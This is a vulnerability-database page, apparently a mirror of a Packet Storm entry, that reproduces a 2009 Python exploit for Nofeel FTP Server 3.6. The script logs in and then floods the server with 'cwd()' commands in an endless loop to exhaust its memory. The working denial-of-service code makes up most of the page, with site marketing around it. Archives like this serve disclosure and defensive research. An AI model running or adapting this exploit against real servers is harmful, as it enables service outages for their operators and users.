Lucene search

K

Nofeel FTP Server 3.6 Memory Consumption

๐Ÿ—“๏ธย 14 Jan 2009ย 00:00:00Reported byย His0k4Typeย 
packetstorm
ย packetstorm
๐Ÿ”—ย packetstormsecurity.com๐Ÿ‘ย 18ย Views

Nofeel FTP Server 3.6 Memory Consumption exploi

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`#!/usr/bin/python  
#   
# ------ | ______ _____ (--, __*__ ______  
# |____| | | | | | ! ) | | |  
# [ | |` | | <> | |-----> |__/ | | | ]  
# | .. | |____! |____| |____ |\ | |-----|  
# | _| \ ----- | ::: |  
# | | \  
# |_____| | \  
# |  
# |  
# ,|.  
# / | \  
# | | |  
# | _ |  
# `._\/.\/_,'  
# _( 8 )_  
# / '_ _' \  
# | /{_}\ |  
# ` | " | `  
# | |  
#  
#  
# [+] Application : Nofeel FTP Server V3.6  
#  
# [+] Vendor URL : http://www.nftpserver.com/  
#  
# [+] Bug : Nofeel FTP Server (CWD) Remote Memory Consumption Exploit  
#  
# [+] Author : His0k4  
#  
# [+] Greetings : All friends & Muslims Hackers (dz)  
# www.snakespc.com  
#---------------------------------------------------------------------------------  
  
import socket  
import struct  
import time  
  
try:  
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
print "\n[*] Nofeel FTP Server Remote Memory Consumption Exploit"  
print "[*] Author: His0k4\r\n"  
connect=s.connect(('127.0.0.1',21))  
s.recv(1024)  
print "[*] Sending Username"  
time.sleep(1)  
s.send('USER test\r\n')  
s.recv(1024)  
print "[+] Sending Password"  
time.sleep(1)  
s.send('PASS ftp\r\n')  
s.recv(1024)  
print "[*] Sending evil command"  
time.sleep(1)  
while (1):  
s.send('cwd()\r\n')  
s.recv(1024)  
s.send('quit\r\n')  
s.recv(1024)  
except:  
print "Can't connect to ftp"  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
14 Jan 2009 00:00Current
0.1Low risk
Vulners AI Score0.1
18
.json
Report